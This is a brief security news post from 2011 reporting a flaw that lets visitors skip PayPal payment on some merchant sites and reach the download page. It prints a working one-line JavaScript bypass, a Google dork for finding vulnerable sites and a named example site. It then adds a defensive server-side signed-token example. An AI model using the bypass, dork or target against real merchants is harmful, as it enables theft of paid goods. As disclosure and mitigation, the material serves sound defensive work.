Critical Vulnerability in PayPal

One of our readers discovered that some websites using a PayPal portal for payment are vulnerable and can be exploited using simple JavaScript. The JavaScript bypasses the payment page and redirects to the download page.

He has already informed PayPal about this issue.

The JavaScript is given below.
javascript:top.location=document.getElementsByName('return')[0].value;javascript:void(0);

The affected websites can easily be found with this Google dork: "this order button requires a javascript enabled browser"

Example of an affected website:
http://www.pleazz.com/craigs/Get_more_backlinks.htm
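
The script above works because the payment form's 'return' field, which any visitor can read, holds the address of the download page. The following is an added example, not code from the original post or from PayPal, of one way a site owner can make that address useless on its own: the download is served only for a short-lived signed token tied to an order that the server has recorded as paid. All function names, the in-memory order store and the order IDs are hypothetical, and it assumes the payment is confirmed server-to-server before markPaid() is called.

```javascript
const crypto = require('crypto');

// Constructed key for the example; a real site would load a fixed secret from config.
const SECRET = crypto.randomBytes(32);
// Hypothetical store of order IDs confirmed as paid on the server side.
const paidOrders = new Set();

// Call only after payment was confirmed server-to-server, never from browser input.
// Assumption: order IDs contain no '.' characters.
function markPaid(orderId) {
  paidOrders.add(orderId);
}

// HMAC over the order ID and expiry time, so neither can be altered by the client.
function sign(orderId, expires) {
  return crypto.createHmac('sha256', SECRET)
    .update(`${orderId}.${expires}`)
    .digest('hex');
}

// Issue a short-lived download token; unpaid orders get nothing.
function issueDownloadToken(orderId, now = Date.now(), ttlMs = 15 * 60 * 1000) {
  if (!paidOrders.has(orderId)) return null;
  const expires = now + ttlMs;
  return `${orderId}.${expires}.${sign(orderId, expires)}`;
}

// Check the token presented with the download request before serving the file.
function verifyDownloadToken(token, now = Date.now()) {
  const parts = String(token).split('.');
  if (parts.length !== 3) return false;
  const [orderId, expiresStr, mac] = parts;
  const expires = Number(expiresStr);
  if (!Number.isSafeInteger(expires) || now > expires) return false;
  const expected = Buffer.from(sign(orderId, expires), 'hex');
  const given = Buffer.from(mac, 'hex');
  if (given.length !== expected.length) return false;
  // Constant-time comparison, then confirm the order is still recorded as paid.
  return crypto.timingSafeEqual(given, expected) && paidOrders.has(orderId);
}
```

With this in place the 'return' field can point at a generic "thank you" page, and the download handler refuses any request that does not carry a valid token.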

We owe this discovery to Farhan Ghumra, a student of Computer Engineering from Rajkot in India.
June 30, 2011
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2013